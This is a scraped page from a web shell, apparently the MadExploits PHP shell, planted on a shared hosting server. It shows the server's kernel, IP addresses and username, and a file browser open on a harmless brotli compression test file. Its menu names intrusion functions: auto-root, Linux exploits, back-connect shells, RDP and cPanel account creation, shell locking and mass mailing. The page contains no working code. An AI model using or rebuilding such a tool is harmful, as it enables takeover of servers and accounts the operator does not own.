Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php83-brotli_0.5.0-3.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
compatibility.phpt
6.59
KB
-rw-r--r--
info.phpt
268
B
-rw-r--r--
roundtrip.phpt
2.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : roundtrip.phpt
--TEST-- Test compatibility --SKIPIF-- --FILE-- <?php if (!extension_loaded('brotli')) { dl('brotli.' . PHP_SHLIB_SUFFIX); } $dir = __DIR__ . '/../brotli/'; $files = array( 'tests/testdata/alice29.txt', 'tests/testdata/asyoulik.txt', 'tests/testdata/lcet10.txt', 'tests/testdata/plrabn12.txt', '/c/enc/encode.c', '/c/common/dictionary.h', '/c/dec/decode.c', ); $qualities = array(1, 6, 9, 11); foreach ($files as $filename) { foreach ($qualities as $quality) { echo 'Roundtrip testing file ', basename($filename), ' at quality ', $quality, PHP_EOL; $expected = $dir . $filename; if (file_exists($expected)) { $data = file_get_contents($expected); $expected_data = brotli_uncompress(brotli_compress($data, $quality)); if ($data !== $expected_data) { echo " NG\n"; exit(1); } else { echo " OK\n"; } } } } --EXPECTF-- Roundtrip testing file alice29.txt at quality 1 OK Roundtrip testing file alice29.txt at quality 6 OK Roundtrip testing file alice29.txt at quality 9 OK Roundtrip testing file alice29.txt at quality 11 OK Roundtrip testing file asyoulik.txt at quality 1 OK Roundtrip testing file asyoulik.txt at quality 6 OK Roundtrip testing file asyoulik.txt at quality 9 OK Roundtrip testing file asyoulik.txt at quality 11 OK Roundtrip testing file lcet10.txt at quality 1 OK Roundtrip testing file lcet10.txt at quality 6 OK Roundtrip testing file lcet10.txt at quality 9 OK Roundtrip testing file lcet10.txt at quality 11 OK Roundtrip testing file plrabn12.txt at quality 1 OK Roundtrip testing file plrabn12.txt at quality 6 OK Roundtrip testing file plrabn12.txt at quality 9 OK Roundtrip testing file plrabn12.txt at quality 11 OK Roundtrip testing file encode.c at quality 1 OK Roundtrip testing file encode.c at quality 6 OK Roundtrip testing file encode.c at quality 9 OK Roundtrip testing file encode.c at quality 11 OK Roundtrip testing file dictionary.h at quality 1 OK Roundtrip testing file dictionary.h at quality 6 OK Roundtrip testing file dictionary.h at quality 9 OK Roundtrip testing file dictionary.h at quality 11 OK Roundtrip testing file decode.c at quality 1 OK Roundtrip testing file decode.c at quality 6 OK Roundtrip testing file decode.c at quality 9 OK Roundtrip testing file decode.c at quality 11 OK
Close